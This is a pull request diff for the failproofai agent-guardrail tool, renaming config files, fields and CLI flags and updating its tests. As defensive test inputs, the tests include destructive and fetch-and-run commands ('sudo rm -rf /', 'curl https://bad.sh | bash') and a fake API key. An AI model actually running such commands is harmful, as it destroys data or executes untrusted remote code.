### PR TITLE
[ef-32] refactor: rename CLI flags, config fields, and config filename

### DIFF
--- a/README.md
+++ b/README.md
@@ -89,7 +89,7 @@ failproofai --remove-policies --scope project
 
 ## Configuration
 
-Policy configuration lives in `~/.failproofai/hooks-config.json` (global) or `.failproofai/hooks-config.json` in your project (per-project).
+Policy configuration lives in `~/.failproofai/policies-config.json` (global) or `.failproofai/policies-config.json` in your project (per-project).
 
 ```json
 {
@@ -182,7 +182,7 @@ customPolicies.add({
 Install with:
 
 ```bash
-failproofai --install-policies --custom-hooks ./my-policies.js
+failproofai --install-policies --custom ./my-policies.js
 ```
 
 ### Decision helpers

--- a/__tests__/e2e/helpers/fixture-env.ts
+++ b/__tests__/e2e/helpers/fixture-env.ts
@@ -2,7 +2,7 @@
  * Per-test fixture environment: isolated cwd and HOME directories.
  *
  * Each call to createFixtureEnv() creates two temp directories:
- *   - cwd:  pass as payload.cwd → hooks-config.json loaded from here
+ *   - cwd:  pass as payload.cwd → policies-config.json loaded from here
  *   - home: pass as runHook opts.homeDir → blocks real ~/.failproofai from leaking in
  *
  * Cleanup is registered via afterEach() automatically.
@@ -13,22 +13,22 @@ import { tmpdir } from "node:os";
 import { afterEach } from "vitest";
 
 export interface FixtureEnv {
-  /** Pass as payload.cwd — hooks-config.json is resolved relative to this. */
+  /** Pass as payload.cwd — policies-config.json is resolved relative to this. */
   cwd: string;
   /** Pass as runHook({ homeDir }) — isolates ~/.failproofai from the real system. */
   home: string;
   /**
-   * Write a hooks-config.json for this fixture.
+   * Write a policies-config.json for this fixture.
    *
    * @param config - The config object to write
-   * @param scope  - "project" → {cwd}/.failproofai/hooks-config.json (default)
-   *                 "local"   → {cwd}/.failproofai/hooks-config.local.json
-   *                 "global"  → {home}/.failproofai/hooks-config.json
+   * @param scope  - "project" → {cwd}/.failproofai/policies-config.json (default)
+   *                 "local"   → {cwd}/.failproofai/policies-config.local.json
+   *                 "global"  → {home}/.failproofai/policies-config.json
    */
   writeConfig(config: object, scope?: "project" | "local" | "global"): void;
   /**
    * Write a custom hook file inside the fixture cwd.
-   * Returns the absolute path (suitable for use as customHooksPath in config).
+   * Returns the absolute path (suitable for use as customPoliciesPath in config).
    */
   writeHook(filename: string, content: string): string;
 }
@@ -52,11 +52,11 @@ export function createFixtureEnv(): FixtureEnv {
       if (scope === "global") {
         const dir = join(home, ".failproofai");
         mkdirSync(dir, { recursive: true });
-        configPath = join(dir, "hooks-config.json");
+        configPath = join(dir, "policies-config.json");
       } else {
         const dir = join(cwd, ".failproofai");
         mkdirSync(dir, { recursive: true });
-        const filename = scope === "local" ? "hooks-config.local.json" : "hooks-config.json";
+        const filename = scope === "local" ? "policies-config.local.json" : "policies-config.json";
         configPath = join(dir, filename);
       }
 

--- a/__tests__/e2e/hooks/config-scopes.e2e.test.ts
+++ b/__tests__/e2e/hooks/config-scopes.e2e.test.ts
@@ -2,7 +2,7 @@
  * E2E tests for config scope merging.
  *
  * Tests src/hooks/hooks-config.ts merge behavior across project / local / global scopes.
- * Priority order: project > local > global for policyParams/customHooksPath.
+ * Priority order: project > local > global for policyParams/customPoliciesPath.
  * enabledPolicies: union across all three scopes.
  */
 import { describe, it } from "vitest";
@@ -96,17 +96,17 @@ describe("config-scopes", () => {
     // Write invalid JSON to the config file directly (bypass env.writeConfig which uses JSON.stringify)
     const dir = join(env.cwd, ".failproofai");
     mkdirSync(dir, { recursive: true });
-    writeFileSync(join(dir, "hooks-config.json"), "not json", "utf8");
+    writeFileSync(join(dir, "policies-config.json"), "not json", "utf8");
     // With malformed config, hook runner should not crash — fail-open
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("sudo rm -rf /", env.cwd), { homeDir: env.home });
     assertAllow(result);
   });
 
-  it("customHooksPath pointing to non-existent file → fail-open (allow)", () => {
+  it("customPoliciesPath pointing to non-existent file → fail-open (allow)", () => {
     const env = createFixtureEnv();
     env.writeConfig({
       enabledPolicies: [],
-      customHooksPath: `${env.cwd}/.hooks/does-not-exist.mjs`,
+      customPoliciesPath: `${env.cwd}/.hooks/does-not-exist.mjs`,
     });
     // Non-existent hooks file — loadCustomHooks should handle gracefully, fail-open
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("ls", env.cwd), { homeDir: env.home });

--- a/__tests__/e2e/hooks/custom-hooks.e2e.test.ts
+++ b/__tests__/e2e/hooks/custom-hooks.e2e.test.ts
@@ -1,7 +1,7 @@
 /**
  * E2E tests for custom hooks loading and execution.
  *
- * Each test writes a temp .mjs file and sets customHooksPath in config.
+ * Each test writes a temp .mjs file and sets customPoliciesPath in config.
  * Also smoke-tests the actual checked-in examples/ files.
  */
 import { describe, it, expect } from "vitest";
@@ -27,7 +27,7 @@ describe("custom-hooks core mechanics", () => {
         fn: async () => deny("blocked by test"),
       });
     `);
-    env.writeConfig({ enabledPolicies: [], customHooksPath: hookPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: hookPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("ls", env.cwd), { homeDir: env.home });
     assertPreToolUseDeny(result);
   });
@@ -43,7 +43,7 @@ describe("custom-hooks core mechanics", () => {
         fn: async () => instruct("do this first"),
       });
     `);
-    env.writeConfig({ enabledPolicies: [], customHooksPath: hookPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: hookPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("ls", env.cwd), { homeDir: env.home });
     assertInstruct(result);
     const output = result.parsed?.hookSpecificOutput as Record<string, unknown> | undefined;
@@ -61,7 +61,7 @@ describe("custom-hooks core mechanics", () => {
         fn: async () => allow(),
       });
     `);
-    env.writeConfig({ enabledPolicies: [], customHooksPath: hookPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: hookPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("ls", env.cwd), { homeDir: env.home });
     assertAllow(result);
   });
@@ -77,7 +77,7 @@ describe("custom-hooks core mechanics", () => {
         fn: async () => { throw new Error("intentional test error"); },
       });
     `);
-    env.writeConfig({ enabledPolicies: [], customHooksPath: hookPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: hookPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("ls", env.cwd), { homeDir: env.home });
     // Fail-open: the binary must not crash, must return allow
     expect(result.exitCode).toBe(0);
@@ -95,7 +95,7 @@ describe("custom-hooks core mechanics", () => {
         fn: async () => deny("stop blocked"),
       });
     `);
-    env.writeConfig({ enabledPolicies: [], customHooksPath: hookPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: hookPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("ls", env.cwd), { homeDir: env.home });
     assertAllow(result);
   });
@@ -111,7 +111,7 @@ describe("custom-hooks core mechanics", () => {
         fn: async () => instruct("wrap up before stopping"),
       });
     `);
-    env.writeConfig({ enabledPolicies: [], customHooksPath: hookPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: hookPath });
     const result = runHook("Stop", Payloads.stop(env.cwd), { homeDir: env.home });
     assertStopInstruct(result);
     expect(result.stderr).toContain("wrap up before stopping");
@@ -128,7 +128,7 @@ describe("custom-hooks core mechanics", () => {
         fn: async () => deny("custom blocked"),
       });
     `);
-    env.writeConfig({ enabledPolicies: ["block-sudo"], customHooksPath: hookPath });
+    env.writeConfig({ enabledPolicies: ["block-sudo"], customPoliciesPath: hookPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("sudo rm /", env.cwd), { homeDir: env.home });
     // Builtin deny — permissionDecisionReason should mention block-sudo, not custom
     assertPreToolUseDeny(result);
@@ -147,7 +147,7 @@ describe("custom-hooks core mechanics", () => {
         fn: async () => deny("custom rule"),
       });
     `);
-    env.writeConfig({ enabledPolicies: ["block-sudo"], customHooksPath: hookPath });
+    env.writeConfig({ enabledPolicies: ["block-sudo"], customPoliciesPath: hookPath });
     // ls is not sudo → builtin allows → custom fires and denies
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("ls -la", env.cwd), { homeDir: env.home });
     assertPreToolUseDeny(result);
@@ -161,49 +161,49 @@ describe("examples/policies-basic.js", () => {
 
   it("block-production-writes: denies Write to production path", () => {
     const env = createFixtureEnv();
-    env.writeConfig({ enabledPolicies: [], customHooksPath: examplesBasicPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: examplesBasicPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.write("/tmp/fixture/production.config.json", "{}", env.cwd), { homeDir: env.home });
     assertPreToolUseDeny(result);
   });
 
   it("block-production-writes: allows Write to non-production path", () => {
     const env = createFixtureEnv();
-    env.writeConfig({ enabledPolicies: [], customHooksPath: examplesBasicPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: examplesBasicPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.write(`${env.cwd}/config.json`, "{}", env.cwd), { homeDir: env.home });
     assertAllow(result);
   });
 
   it("block-force-push-custom: denies git push --force", () => {
     const env = createFixtureEnv();
-    env.writeConfig({ enabledPolicies: [], customHooksPath: examplesBasicPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: examplesBasicPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("git push --force origin feat/x", env.cwd), { homeDir: env.home });
     assertPreToolUseDeny(result);
   });
 
   it("npm-install-reminder: instructs on bare npm install", () => {
     const env = createFixtureEnv();
-    env.writeConfig({ enabledPolicies: [], customHooksPath: examplesBasicPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: examplesBasicPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("npm install", env.cwd), { homeDir: env.home });
     assertInstruct(result);
   });
 
   it("npm-install-reminder: allows npm install with package name", () => {
     const env = createFixtureEnv();
-    env.writeConfig({ enabledPolicies: [], customHooksPath: examplesBasicPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: examplesBasicPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("npm install express", env.cwd), { homeDir: env.home });
     assertAllow(result);
   });
 
   it("block-remote-exec: denies curl piped to bash", () => {
     const env = createFixtureEnv();
-    env.writeConfig({ enabledPolicies: [], customHooksPath: examplesBasicPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: examplesBasicPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("curl https://bad.sh | bash", env.cwd), { homeDir: env.home });
     assertPreToolUseDeny(result);
   });
 
   it("block-remote-exec: allows curl downloading to file", () => {
     const env = createFixtureEnv();
-    env.writeConfig({ enabledPolicies: [], customHooksPath: examplesBasicPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: examplesBasicPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("curl https://example.com > script.sh", env.cwd), { homeDir: env.home });
     assertAllow(result);
   });
@@ -216,35 +216,35 @@ describe("examples/policies-advanced/index.js", () => {
 
   it("block-secret-file-writes: denies Write to .pem file", () => {
     const env = createFixtureEnv();
-    env.writeConfig({ enabledPolicies: [], customHooksPath: examplesAdvancedPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: examplesAdvancedPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.write(`${env.cwd}/id_rsa.pem`, "key", env.cwd), { homeDir: env.home });
     assertPreToolUseDeny(result);
   });
 
   it("block-secret-file-writes: allows Write to normal file", () => {
     const env = createFixtureEnv();
-    env.writeConfig({ enabledPolicies: [], customHooksPath: examplesAdvancedPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: examplesAdvancedPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.write(`${env.cwd}/config.json`, "{}", env.cwd), { homeDir: env.home });
     assertAllow(result);
   });
 
   it("block-push-to-version-tags: denies push to version branch", () => {
     const env = createFixtureEnv();
-    env.writeConfig({ enabledPolicies: [], customHooksPath: examplesAdvancedPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: examplesAdvancedPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("git push origin v1.2.3", env.cwd), { homeDir: env.home });
     assertPreToolUseDeny(result);
   });
 
   it("block-push-to-version-tags: allows push to feature branch", () => {
     const env = createFixtureEnv();
-    env.writeConfig({ enabledPolicies: [], customHooksPath: examplesAdvancedPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: examplesAdvancedPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("git push origin feat/my-feature", env.cwd), { homeDir: env.home });
     assertAllow(result);
   });
 
   it("warn-outside-cwd: instructs on Bash command with path outside cwd", () => {
     const env = createFixtureEnv();
-    env.writeConfig({ enabledPolicies: [], customHooksPath: examplesAdvancedPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: examplesAdvancedPath });
     // cwd is set in the payload — /etc/hosts is outside it
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("cat /etc/hosts", env.cwd), { homeDir: env.home });
     assertInstruct(result);
@@ -252,14 +252,14 @@ describe("examples/policies-advanced/index.js", () => {
 
   it("warn-outside-cwd: allows relative path inside cwd", () => {
     const env = createFixtureEnv();
-    env.writeConfig({ enabledPolicies: [], customHooksPath: examplesAdvancedPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: examplesAdvancedPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("cat ./src/main.ts", env.cwd), { homeDir: env.home });
     assertAllow(result);
   });
 
   it("scrub-api-key-output: denies PostToolUse Bash output with API key pattern", () => {
     const env = createFixtureEnv();
-    env.writeConfig({ enabledPolicies: [], customHooksPath: examplesAdvancedPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: examplesAdvancedPath });
     // sk- followed by 25+ alphanumeric chars matches the advanced hook's heuristic
     const fakeKey = "sk-" + "a".repeat(25);
     const result = runHook("PostToolUse", Payloads.postToolUse.bash("env", fakeKey, env.cwd), { homeDir: env.home });
@@ -268,7 +268,7 @@ describe("examples/policies-advanced/index.js", () => {
 
   it("scrub-api-key-output: allows clean PostToolUse output", () => {
     const env = createFixtureEnv();
-    env.writeConfig({ enabledPolicies: [], customHooksPath: examplesAdvancedPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: examplesAdvancedPath });
     const result = runHook("PostToolUse", Payloads.postToolUse.bash("ls", "file1.txt", env.cwd), { homeDir: env.home });
     assertAllow(result);
   });
@@ -287,7 +287,7 @@ describe("custom-hooks — no match filter", () => {
         fn: async () => deny("no filter"),
       });
     `);
-    env.writeConfig({ enabledPolicies: [], customHooksPath: hookPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: hookPath });
     // Fire on PostToolUse (not just PreToolUse)
     const result = runHook("PostToolUse", Payloads.postToolUse.bash("ls", "output", env.cwd), { homeDir: env.home });
     assertPostToolUseDeny(result);
@@ -310,15 +310,15 @@ describe("custom-hooks — multiple hooks in sequence", () => {
         fn: async () => deny("second hook fired"),
       });
     `);
-    env.writeConfig({ enabledPolicies: [], customHooksPath: hookPath });
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: hookPath });
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("ls", env.cwd), { homeDir: env.home });
     // Second hook should deny even though first allowed
     assertPreToolUseDeny(result);
   });
 });
 
-describe("custom-hooks — customHooksPath scope levels", () => {
-  it("customHooksPath from project scope fires the hook", () => {
+describe("custom-hooks — customPoliciesPath scope levels", () => {
+  it("customPoliciesPath from project scope fires the hook", () => {
     const env = createFixtureEnv();
     const hookPath = env.writeHook("project-deny.mjs", `
       import { customPolicies, deny } from "failproofai";
@@ -328,12 +328,12 @@ describe("custom-hooks — customHooksPath scope levels", () => {
         fn: async () => deny("from project scope"),
       });
     `);
-    env.writeConfig({ enabledPolicies: [], customHooksPath: hookPath }, "project");
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: hookPath }, "project");
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("ls", env.cwd), { homeDir: env.home });
     assertPreToolUseDeny(result);
   });
 
-  it("customHooksPath from global scope fires the hook", () => {
+  it("customPoliciesPath from global scope fires the hook", () => {
     const env = createFixtureEnv();
     const hookPath = env.writeHook("global-deny.mjs", `
       import { customPolicies, deny } from "failproofai";
@@ -343,12 +343,12 @@ describe("custom-hooks — customHooksPath scope levels", () => {
         fn: async () => deny("from global scope"),
       });
     `);
-    env.writeConfig({ enabledPolicies: [], customHooksPath: hookPath }, "global");
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: hookPath }, "global");
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("ls", env.cwd), { homeDir: env.home });
     assertPreToolUseDeny(result);
   });
 
-  it("project customHooksPath shadows global (project > global precedence)", () => {
+  it("project customPoliciesPath shadows global (project > global precedence)", () => {
     const env = createFixtureEnv();
     // Global hook: deny
     const globalHookPath = env.writeHook("global-deny.mjs", `
@@ -368,8 +368,8 @@ describe("custom-hooks — customHooksPath scope levels", () => {
         fn: async () => allow(),
       });
     `);
-    env.writeConfig({ enabledPolicies: [], customHooksPath: globalHookPath }, "global");
-    env.writeConfig({ enabledPolicies: [], customHooksPath: projectHookPath }, "project");
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: globalHookPath }, "global");
+    env.writeConfig({ enabledPolicies: [], customPoliciesPath: projectHookPath }, "project");
     // Project scope wins — only the project allow hook loads; global deny is shadowed
     const result = runHook("PreToolUse", Payloads.preToolUse.bash("ls", env.cwd), { homeDir: env.home });
     assertAllow(result);

--- a/__tests__/hooks/block-read-outside-cwd.test.ts
+++ b/__tests__/hooks/block-read-outside-cwd.test.ts
@@ -327,12 +327,12 @@ describe("block-read-outside-cwd policy", () => {
     const home = os.homedir();
     const ctx = makeCtx({
       toolName: "Bash",
-      toolInput: { command: "cat ~/.failproofai/hooks-config.json" },
+      toolInput: { command: "cat ~/.failproofai/policies-config.json" },
       session: { cwd: "/home/user/project" },
     });
     const result = await policy.fn(ctx);
     expect(result.decision).toBe("deny");
-    expect(result.reason).toContain(`${home}/.failproofai/hooks-config.json`);
+    expect(result.reason).toContain(`${home}/.failproofai/policies-config.json`);
   });
 
   it("allows Read with relative file_path resolved against session cwd", async () => {

--- a/__tests__/hooks/custom-hooks-loader.test.ts
+++ b/__tests__/hooks/custom-hooks-loader.test.ts
@@ -29,13 +29,13 @@ describe("hooks/custom-hooks-loader", () => {
     vi.resetAllMocks();
   });
 
-  it("returns [] when customHooksPath is undefined", async () => {
+  it("returns [] when customPoliciesPath is undefined", async () => {
     const { loadCustomHooks } = await import("../../src/hooks/custom-hooks-loader");
     const result = await loadCustomHooks(undefined);
     expect(result).toEqual([]);
   });
 
-  it("returns [] when customHooksPath is empty string", async () => {
+  it("returns [] when customPoliciesPath is empty string", async () => {
     const { loadCustomHooks } = await import("../../src/hooks/custom-hooks-loader");
     const result = await loadCustomHooks("");
     expect(result).toEqual([]);

--- a/__tests__/hooks/hooks-config.test.ts
+++ b/__tests__/hooks/hooks-config.test.ts
@@ -11,7 +11,7 @@ vi.mock("node:fs", () => ({
   mkdirSync: vi.fn(),
 }));
 
-const CONFIG_PATH = resolve(homedir(), ".failproofai", "hooks-config.json");
+const CONFIG_PATH = resolve(homedir(), ".failproofai", "policies-config.json");
 
 describe("hooks/hooks-config", () => {
   beforeEach(() => {
@@ -71,9 +71,9 @@ describe("hooks/hooks-config", () => {
 
   describe("readMergedHooksConfig", () => {
     const CWD = "/tmp/test-project";
-    const projectPath = resolve(CWD, ".failproofai", "hooks-config.json");
-    const localPath = resolve(CWD, ".failproofai", "hooks-config.local.json");
-    const globalPath = resolve(homedir(), ".failproofai", "hooks-config.json");
+    const projectPath = resolve(CWD, ".failproofai", "policies-config.json");
+    const localPath = resolve(CWD, ".failproofai", "policies-config.local.json");
+    const globalPath = resolve(homedir(), ".failproofai", "policies-config.json");
 
     function mockFiles(files: Record<string, object>): void {
       vi.mocked(existsSync).mockImplementation((p) => String(p) in files);
@@ -90,7 +90,7 @@ describe("hooks/hooks-config", () => {
       const config = readMergedHooksConfig(CWD);
       expect(config.enabledPolicies).toEqual([]);
       expect(config.policyParams).toBeUndefined();
-      expect(config.customHooksPath).toBeUndefined();
+      expect(config.customPoliciesPath).toBeUndefined();
     });
 
     it("returns global config when only global exists", async () => {
@@ -162,24 +162,24 @@ describe("hooks/hooks-config", () => {
       expect(config.policyParams?.["block-push-master"]).toEqual({ protectedBranches: ["release"] });
     });
 
-    it("customHooksPath: first scope that defines it wins", async () => {
+    it("customPoliciesPath: first scope that defines it wins", async () => {
       mockFiles({
-        [localPath]: { enabledPolicies: [], customHooksPath: "/local/hooks.js" },
-        [globalPath]: { enabledPolicies: [], customHooksPath: "/global/hooks.js" },
+        [localPath]: { enabledPolicies: [], customPoliciesPath: "/local/hooks.js" },
+        [globalPath]: { enabledPolicies: [], customPoliciesPath: "/global/hooks.js" },
       });
       const { readMergedHooksConfig } = await import("../../src/hooks/hooks-config");
       const config = readMergedHooksConfig(CWD);
-      expect(config.customHooksPath).toBe("/local/hooks.js");
+      expect(config.customPoliciesPath).toBe("/local/hooks.js");
     });
 
-    it("customHooksPath: project scope wins over local", async () => {
+    it("customPoliciesPath: project scope wins over local", async () => {
       mockFiles({
-        [projectPath]: { enabledPolicies: [], customHooksPath: "/project/hooks.js" },
-        [localPath]: { enabledPolicies: [], customHooksPath: "/local/hooks.js" },
+        [projectPath]: { enabledPolicies: [], customPoliciesPath: "/project/hooks.js" },
+        [localPath]: { enabledPolicies: [], customPoliciesPath: "/local/hooks.js" },
       });
       const { readMergedHooksConfig } = await import("../../src/hooks/hooks-config");
       const config = readMergedHooksConfig(CWD);
-      expect(config.customHooksPath).toBe("/project/hooks.js");
+      expect(config.customPoliciesPath).toBe("/project/hooks.js");
     });
 
     it("returns no policyParams key when no params configured", async () => {

--- a/__tests__/hooks/manager.test.ts
+++ b/__tests__/hooks/manager.test.ts
@@ -364,7 +364,7 @@ describe("hooks/manager", () => {
       );
     });
 
-    it("saves resolved absolute customHooksPath when customHooksPath provided", async () => {
+    it("saves resolved absolute customPoliciesPath when customPoliciesPath provided", async () => {
       vi.mocked(existsSync).mockReturnValue(true);
       vi.mocked(readFileSync).mockReturnValue("{}");
 
@@ -380,20 +380,20 @@ describe("hooks/manager", () => {
 
       expect(writeHooksConfig).toHaveBeenCalledWith(
         expect.objectContaining({
-          customHooksPath: resolve("/tmp/my-hooks.js"),
+          customPoliciesPath: resolve("/tmp/my-hooks.js"),
         }),
       );
       const logs = vi.mocked(console.log).mock.calls.map((c) => c[0]);
       expect(logs.some((l: unknown) => typeof l === "string" && l.includes(resolve("/tmp/my-hooks.js")))).toBe(true);
     });
 
-    it("clears customHooksPath when removeCustomHooks is true", async () => {
+    it("clears customPoliciesPath when removeCustomHooks is true", async () => {
       vi.mocked(existsSync).mockReturnValue(true);
       vi.mocked(readFileSync).mockReturnValue("{}");
       const { readHooksConfig, writeHooksConfig } = await import("../../src/hooks/hooks-config");
       vi.mocked(readHooksConfig).mockReturnValue({
         enabledPolicies: ["block-sudo"],
-        customHooksPath: "/tmp/old-hooks.js",
+        customPoliciesPath: "/tmp/old-hooks.js",
       });
 
       const { installHooks } = await import("../../src/hooks/manager");
@@ -401,7 +401,7 @@ describe("hooks/manager", () => {
       await installHooks(["block-sudo"], "user", undefined, false, undefined, undefined, true);
 
       const [[written]] = vi.mocked(writeHooksConfig).mock.calls;
-      expect((written as unknown as Record<string, unknown>).customHooksPath).toBeUndefined();
+      expect((written as unknown as Record<string, unknown>).customPoliciesPath).toBeUndefined();
       const logs = vi.mocked(console.log).mock.calls.map((c) => c[0]);
       expect(logs.some((l: unknown) => typeof l === "string" && l.includes("Custom hooks path cleared"))).toBe(true);
     });
@@ -992,11 +992,11 @@ describe("hooks/manager", () => {
       expect(output).toContain("not-a-real-policy");
     });
 
-    it("shows Custom Policies section with loaded hooks when customHooksPath is set", async () => {
+    it("shows Custom Policies section with loaded hooks when customPoliciesPath is set", async () => {
       const { readMergedHooksConfig } = await import("../../src/hooks/hooks-config");
       vi.mocked(readMergedHooksConfig).mockReturnValue({
         enabledPolicies: [],
-        customHooksPath: "/tmp/my-hooks.js",
+        customPoliciesPath: "/tmp/my-hooks.js",
       });
 
       vi.mocked(existsSync).mockImplementation((p) => p === "/tmp/my-hooks.js");
@@ -1017,11 +1017,11 @@ describe("hooks/manager", () => {
       expect(output).toContain("does something");
     });
 
-    it("shows error row when customHooksPath file exists but fails to load", async () => {
+    it("shows error row when customPoliciesPath file exists but fails to load", async () => {
       const { readMergedHooksConfig } = await import("../../src/hooks/hooks-config");
       vi.mocked(readMergedHooksConfig).mockReturnValue({
         enabledPolicies: [],
-        customHooksPath: "/tmp/broken-hooks.js",
+        customPoliciesPath: "/tmp/broken-hooks.js",
       });
 
       vi.mocked(existsSync).mockImplementation((p) => p === "/tmp/broken-hooks.js");

--- a/app/actions/get-hooks-config.ts
+++ b/app/actions/get-hooks-config.ts
@@ -37,7 +37,7 @@ export interface HooksConfigPayload {
   installedScopes: HookScope[];
   settingsPath: string;
   policies: PolicyInfo[];
-  customHooksPath?: string;
+  customPoliciesPath?: string;
   customPolicies?: CustomPolicyInfo[];
 }
 
@@ -90,8 +90,8 @@ export async function getHooksConfigAction(): Promise<HooksConfigPayload> {
     currentParams: p.params ? (config.policyParams?.[p.name] ?? {}) : undefined,
   }));
 
-  const customPolicies = config.customHooksPath
-    ? await parseCustomPoliciesFromFile(config.customHooksPath)
+  const customPolicies = config.customPoliciesPath
+    ? await parseCustomPoliciesFromFile(config.customPoliciesPath)
     : undefined;
 
   return {
@@ -99,7 +99,7 @@ export async function getHooksConfigAction(): Promise<HooksConfigPayload> {
     installedScopes,
     settingsPath,
     policies,
-    customHooksPath: config.customHooksPath,
+    customPoliciesPath: config.customPoliciesPath,
     customPolicies: customPolicies?.length ? customPolicies : undefined,
   };
 }

--- a/app/policies/hooks-client.tsx
+++ b/app/policies/hooks-client.tsx
@@ -1097,7 +1097,7 @@ function PoliciesTab({ onHooksInstallChange }: { onHooksInstallChange?: (install
       })}
 
       {/* Custom policies section */}
-      {config.customHooksPath && (
+      {config.customPoliciesPath && (
         <div>
           {/* Section header — matches category header style */}
           <div className="flex items-center justify-between px-4 py-2.5 bg-muted/20 border-b border-border/50">
@@ -1111,7 +1111,7 @@ function PoliciesTab({ onHooksInstallChange }: { onHooksInstallChange?: (install
           {/* File path row */}
           <div className="flex items-center gap-3 px-4 py-3 border-b border-border/20">
             <Code className="h-3.5 w-3.5 text-muted-foreground shrink-0" />
-            <span className="text-xs font-mono text-muted-foreground truncate">{config.customHooksPath}</span>
+            <span className="text-xs font-mono text-muted-foreground truncate">{config.customPoliciesPath}</span>
           </div>
           {/* Reconfigure notice */}
           <div className="flex items-start gap-2 px-4 py-2.5 border-b border-border/20 bg-muted/10">

--- a/bin/failproofai.mjs
+++ b/bin/failproofai.mjs
@@ -5,6 +5,7 @@
  * Handles:
  *   --hook <event>        Hook event from Claude Code (minimal startup latency)
  *   --version / -v        Print version and exit
+ *   --help / -h           Show usage and exit
  *   --install-policies    Install hooks + enable policies in Claude Code settings
  *   --remove-policies     Remove hooks or disable policies from Claude Code settings
  *   --list-policies       List available policies and their status
@@ -27,6 +28,43 @@ if (!process.env.FAILPROOFAI_PACKAGE_ROOT) {
 
 const args = process.argv.slice(2);
 
+// --help / -h
+if (args.includes("--help") || args.includes("-h")) {
+  console.log(`
+failproofai v${version}
+
+USAGE
+  failproofai [command] [options]
+
+COMMANDS
+  (no args)                      Launch the policy dashboard
+
+  --install-policies [names...]  Enable policies in Claude Code settings
+    --scope user|project|local     Config scope to write to (default: user)
+    --beta                         Include beta policies
+    --custom <path>                Path to a JS file of custom policies
+
+  --remove-policies [names...]   Disable policies or remove hooks
+    --scope user|project|local|all Config scope to remove from (default: user)
+    --beta                         Remove only beta policies
+    --custom                       Clear the customPoliciesPath from config
+
+  --list-policies                List all available policies and their status
+
+  --version, -v                  Print version and exit
+  --help, -h                     Show this help message
+
+EXAMPLES
+  failproofai --install-policies
+  failproofai --install-policies block-sudo sanitize-api-keys --scope project
+  failproofai --install-policies --custom ./my-policies.js
+  failproofai --remove-policies block-sudo
+  failproofai --remove-policies --custom
+  failproofai --list-policies
+`.trimStart());
+  process.exit(0);
+}
+
 // --version / -v
 if (args.includes("--version") || args.includes("-v")) {
   console.log(version);
@@ -41,24 +79,23 @@ if (hookIdx >= 0 && args[hookIdx + 1]) {
   process.exit(exitCode);
 }
 
-// --install-policies [policyNames...] [--scope user|project|local] [--beta] [--custom-hooks <path>] [--remove-custom-hooks]
+// --install-policies [policyNames...] [--scope user|project|local] [--beta] [--custom <path>]
 if (args.includes("--install-policies")) {
   const { installHooks } = await import("../src/hooks/manager");
 
   const scopeIdx = args.indexOf("--scope");
   const scope = scopeIdx >= 0 ? args[scopeIdx + 1] : "user";
 
-  const customHooksIdx = args.indexOf("--custom-hooks");
-  const customHooksPath = customHooksIdx >= 0 ? args[customHooksIdx + 1] : undefined;
+  const customIdx = args.indexOf("--custom");
+  const customPoliciesPath = customIdx >= 0 ? args[customIdx + 1] : undefined;
 
   const includeBeta = args.includes("--beta");
-  const removeCustomHooks = args.includes("--remove-custom-hooks");
 
   // Collect positional policy names (args after --install-policies that don't start with --)
   const installIdx = args.indexOf("--install-policies");
   const policyNames = args
     .slice(installIdx + 1)
-    .filter((a) => !a.startsWith("--") && a !== scope && a !== customHooksPath);
+    .filter((a) => !a.startsWith("--") && a !== scope && a !== customPoliciesPath);
 
   await installHooks(
     policyNames.length > 0 ? policyNames : undefined,
@@ -66,20 +103,20 @@ if (args.includes("--install-policies")) {
     undefined,
     includeBeta,
     undefined,
-    customHooksPath,
-    removeCustomHooks,
+    customPoliciesPath,
   );
   process.exit(0);
 }
 
